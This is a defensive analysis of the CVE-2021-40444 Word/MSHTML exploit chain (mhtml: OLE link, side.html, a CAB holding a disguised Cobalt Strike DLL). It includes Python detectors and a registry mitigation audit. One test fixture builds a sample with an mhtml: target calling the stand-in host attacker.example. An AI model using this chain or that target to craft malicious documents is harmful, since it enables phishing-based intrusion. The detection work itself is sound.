CVE-2021-40444 originates in the ActiveX support of MSHTML, the rendering engine of Internet Explorer. Although few people browse with Internet Explorer these days, its engine remains a component of modern Windows, and Microsoft Office applications such as Word and PowerPoint use it to render web content inside documents. Because that old Internet Explorer engine is used for this rendering, a document can reach the vulnerable code without the browser ever being opened.
To exploit CVE-2021-40444, the attacker uses a Microsoft Word document that makes the target device fetch content from a web address under the attacker's control. From that site a Cabinet archive named ministry.cab is downloaded through ActiveX; it contains a file named championship.inf, which is in fact the Cobalt Strike payload.
Once the target opens this malicious Word document, the attacker takes control of the device. This is not the normal flow of the Word application: ActiveX is abused to perform the download. In the process tree, control.exe is seen being launched under Word as the CVE-2021-40444 exploit runs, and the payload that was downloaded to the user's AppData/Local/Temp/Low folder is executed.
As soon as the Word file is opened on the target device, the embedded control makes a request via ActiveX to a page named side.html on the attacker's server; this page carries the script that exploits the vulnerability.
The web address used for the exploit is visible as a plain string in the Word document's relationship part (document.xml.rels). The section marked in red is the attacker's web address used during exploitation. The mhtml: prefix at the beginning of the address that points to the malware indicates that the MHTML protocol handler, and therefore the MSHTML engine that Office embeds, is used to fetch it.
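The relationship part is a plain XML file inside the .docx zip, so the mhtml: indicator above can be checked without opening the document in Word. The following scanner is an added example written for this article, not code from the original analysis or from any tool it mentions: it walks every *.rels part of a .docx, flags oleObject relationships whose TargetMode is External and whose target uses the mhtml:, http: or https: scheme, and builds its own constructed sample document for the run. The domain attacker.example and the exact target string are assumptions standing in for the real address that was marked in red.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
STYLES_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"

# Schemes that make Office hand the target to MSHTML/URLMon for a remote fetch.
REMOTE_SCHEMES = {"mhtml", "http", "https"}


def build_sample_docx(ole_target):
    """Constructed input: a minimal .docx-style zip holding only the parts the
    scanner looks at. A real document has many more parts; this is not a real sample."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{STYLES_REL_TYPE}" Target="styles.xml"/>'
        f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="{ole_target}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def scan_docx_rels(docx_bytes):
    """Return one finding per relationship (in any *.rels part) that points an OLE
    object at an external URL. An mhtml: target is the CVE-2021-40444 signature; a
    plain http(s) external oleObject is still unusual, so it is reported as well."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                scheme = target.split(":", 1)[0].lower() if ":" in target else ""
                if rel.get("TargetMode") != "External" or scheme not in REMOTE_SCHEMES:
                    continue
                if not rel.get("Type", "").endswith("/oleObject"):
                    continue
                findings.append({
                    "part": part,
                    "id": rel.get("Id"),
                    "target": target,
                    "mhtml": scheme == "mhtml",
                })
    return findings


if __name__ == "__main__":
    # Assumed target: public samples used an "mhtml:<url>!x-usc:<url>" form; the check
    # keys on the scheme prefix, so either that form or a bare mhtml:<url> is caught.
    sample = build_sample_docx(
        "mhtml:http://attacker.example/side.html!x-usc:http://attacker.example/side.html"
    )
    for f in scan_docx_rels(sample):
        kind = "MHTML " if f["mhtml"] else ""
        print(f"{f['part']} {f['id']}: {kind}external OLE target {f['target']}")
```

Run it against a suspect .docx by replacing the constructed sample with the file's bytes; a hit on an External oleObject with an mhtml: target is the string this section describes, and it is present in the zip whether or not the document ever gets opened.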
In the code fragment shown in the picture, the script uses an ActiveXObject to download the .cab file (the malware) from the attacker's server and have it extracted into the user's AppData/Local/Temp/Low folder, a location chosen by the attacker. In the second stage the script opens the extracted championship.inf from that .cab through a .cpl: path, which causes control.exe to launch rundll32.exe to run it.
The championship.inf inside the attacker's ministry.cab Cabinet file is not a real setup information file: it begins with a DOS MZ header, i.e. it is a PE executable (a DLL), which is why it can be run with rundll32.exe.
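The extension lie in championship.inf is the kind of thing a CAB triage script catches without extracting anything to disk. The block below is an added example for this article, not code from the original analysis: it parses the Cabinet format (CFHEADER, CFFOLDER, CFFILE, CFDATA) for uncompressed folders, then reports members whose bytes start with an MZ header but whose extension is not executable, and member names carrying path separators or "..", which would let a CAB write outside its extraction directory. The ministry.cab stand-in it builds is constructed, with a fake MZ/PE stub instead of the real payload.

```python
import struct

CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")  # 36 bytes: MSCF, sizes, offsets, counts, flags
CFFOLDER = struct.Struct("<IHH")             # coffCabStart, cCFData, typeCompress
CFFILE = struct.Struct("<IIHHHH")            # cbFile, uoffFolderStart, iFolder, date, time, attribs; then NUL name
CFDATA = struct.Struct("<IHH")               # csum, cbData, cbUncomp; then payload
COMPRESS_NONE = 0
PE_EXTENSIONS = {"exe", "dll", "cpl", "scr", "ocx", "sys"}


def build_cab(files):
    """Constructed test input: a single-folder, uncompressed CAB holding `files`,
    a list of (name, bytes). csum is left zero; real extractors may verify it."""
    folder_data = b"".join(data for _, data in files)
    entries, offset = b"", 0
    for name, data in files:
        entries += CFFILE.pack(len(data), offset, 0, 0, 0, 0x20) + name.encode("latin-1") + b"\0"
        offset += len(data)
    block = CFDATA.pack(0, len(folder_data), len(folder_data)) + folder_data
    coff_files = CFHEADER.size + CFFOLDER.size
    coff_data = coff_files + len(entries)
    header = CFHEADER.pack(b"MSCF", 0, coff_data + len(block), 0, coff_files, 0,
                           3, 1, 1, len(files), 0, 0, 0)
    return header + CFFOLDER.pack(coff_data, 1, COMPRESS_NONE) + entries + block


def parse_cab(blob):
    """Walk CFHEADER -> CFFOLDER -> CFFILE -> CFDATA and return the member list with
    contents for uncompressed folders (content is None for MSZIP/LZX folders)."""
    sig, _, _, _, coff_files, _, _, _, n_folders, n_files, flags, _, _ = CFHEADER.unpack_from(blob, 0)
    if sig != b"MSCF":
        raise ValueError("not a cabinet: missing MSCF signature")
    if flags & 0x4:
        raise ValueError("cfhdrRESERVE_PRESENT set; reserved areas are not handled here")
    folders = [CFFOLDER.unpack_from(blob, CFHEADER.size + i * CFFOLDER.size) for i in range(n_folders)]
    folder_data = []
    for coff_start, n_blocks, ctype in folders:
        if ctype & 0x000F != COMPRESS_NONE:
            folder_data.append(None)
            continue
        buf, pos = b"", coff_start
        for _ in range(n_blocks):
            _, cb_data, _ = CFDATA.unpack_from(blob, pos)
            pos += CFDATA.size
            buf += blob[pos:pos + cb_data]
            pos += cb_data
        folder_data.append(buf)
    members, pos = [], coff_files
    for _ in range(n_files):
        cb_file, uoff, ifolder, _, _, _ = CFFILE.unpack_from(blob, pos)
        pos += CFFILE.size
        end = blob.index(b"\0", pos)
        name = blob[pos:end].decode("latin-1")
        pos = end + 1
        # iFolder values 0xFFFD..0xFFFF mark folders continued across cabinets; treat as unavailable.
        data = folder_data[ifolder] if ifolder < len(folder_data) else None
        members.append({"name": name, "size": cb_file,
                        "content": None if data is None else data[uoff:uoff + cb_file]})
    return members


def triage_cab(blob):
    """Flag members whose bytes are a PE image (MZ) behind a non-executable extension,
    and names carrying path separators or '..' that could escape the extraction dir."""
    out = []
    for m in parse_cab(blob):
        ext = m["name"].rsplit(".", 1)[-1].lower() if "." in m["name"] else ""
        is_pe = m["content"] is not None and m["content"][:2] == b"MZ"
        out.append({"name": m["name"], "size": m["size"], "is_pe": is_pe,
                    "masquerade": is_pe and ext not in PE_EXTENSIONS,
                    "traversal": ".." in m["name"] or "/" in m["name"] or "\\" in m["name"]})
    return out


if __name__ == "__main__":
    # Constructed stand-in for ministry.cab: a fake DLL (MZ header + padding) named championship.inf.
    fake_dll = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"
    cab = build_cab([("championship.inf", fake_dll), ("readme.txt", b"hello\r\n")])
    for finding in triage_cab(cab):
        print(finding)
```

For a real sample, read the .cab bytes from disk and pass them to triage_cab; members in MSZIP or LZX folders come back with content None, so for those extract with a proper CAB tool first and run the MZ check on the extracted file.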
Attackers craft a malicious ActiveX control that is loaded through the MSHTML rendering engine when a Microsoft Office document is opened. After embedding such a control in an Office document, the attacker must deliver the document to the user, which is mostly done by phishing (MITRE ATT&CK T1566): the document is sent as an email attachment or linked from an email. The user then has to open the document for the vulnerability to be triggered.
After the malicious document is opened the exploit fires, and the picture shows the malware being downloaded from the attacker's web address.
- Turn off ActiveX controls
Save the registry code below as a .reg file, run it with administrator rights, then restart the device.
Windows Registry Editor Version 5.00
- Configure Microsoft Office to open documents received from the Internet in Protected View automatically, and block macros.
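Microsoft's published workaround for disabling ActiveX in Internet Explorer sets the URL actions 1001 (download signed ActiveX controls) and 1004 (download unsigned ActiveX controls) to 3 (disable) in zones 0 to 3 under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones. The block below is an added example for this article, not the .reg file from the original post: it renders that .reg text, and it parses a registry export (the text `reg export` or Registry Editor produces) to report every zone where either action is still not disabled, so the mitigation can be verified after the restart. The weak export it audits is constructed.

```python
import re

ZONES_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"
# URL actions from Microsoft's workaround. Value meaning: 0 = enable, 1 = prompt, 3 = disable.
ACTIVEX_ACTIONS = {"1001": "Download signed ActiveX controls",
                   "1004": "Download unsigned ActiveX controls"}
DISABLE = 3
ALL_ZONES = (0, 1, 2, 3)  # Local Machine, Local intranet, Trusted sites, Internet


def workaround_reg(zones=ALL_ZONES):
    """Render the .reg file that sets both ActiveX download actions to 'disable' per zone."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for z in zones:
        lines.append(f"[{ZONES_KEY}\\{z}]")
        lines.extend(f'"{action}"=dword:{DISABLE:08x}' for action in ACTIVEX_ACTIONS)
        lines.append("")
    return "\r\n".join(lines)


_KEY_RE = re.compile(r"^\[(.+)\]$")
_VALUE_RE = re.compile(r'^"([^"]+)"=(dword:([0-9a-fA-F]{8})|"(.*)")$')


def parse_reg(text):
    """Parse .reg text into {key: {value_name: int | str}}.
    Only dword and plain string values are handled; other types are skipped."""
    tree, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            tree.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, _, dword, string = m.groups()
            tree[current][name] = int(dword, 16) if dword is not None else string
    return tree


def audit_activex(reg_text, zones=ALL_ZONES):
    """Return (zone, action, current_value) for every zone/action not set to DISABLE.
    A missing value is reported too: the zone then falls back to its template default."""
    tree = parse_reg(reg_text)
    findings = []
    for z in zones:
        values = tree.get(f"{ZONES_KEY}\\{z}", {})
        for action in ACTIVEX_ACTIONS:
            current = values.get(action)
            if current != DISABLE:
                findings.append((z, action, current))
    return findings


if __name__ == "__main__":
    # Constructed export: zone 3 (Internet) still allows signed controls, zone 2 has no values at all.
    weak = "\r\n".join([
        "Windows Registry Editor Version 5.00", "",
        f"[{ZONES_KEY}\\3]", '"1001"=dword:00000000', '"1004"=dword:00000003', "",
    ])
    print("findings:", audit_activex(weak, zones=(2, 3)))
    print(workaround_reg())
```

On a real host, export the Zones key with `reg export` to a file, open it as text and pass it to audit_activex; an empty result means every zone has both actions set to disable. The check reads the machine-wide key only; if a user has per-user zone settings under HKEY_CURRENT_USER, export and audit that key the same way.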
At the time of writing, Microsoft had not yet released a patch for this vulnerability, so the workarounds above were the only protection; Microsoft subsequently fixed CVE-2021-40444 in the September 2021 security updates.
.DOCX file #1 (A Letter before court 4.docx):
.DOCX file #2 (PRD.docx):
.DOCX file #3 (Project details (1).docx):
.DOCX file #4 (App description.docx):
.DOCX file #5 (court.docx):
.HTML file (side.html):
.CAB file (ministry.cab):
.DLL file (payload.dll):
.XML file (document.xml.rels):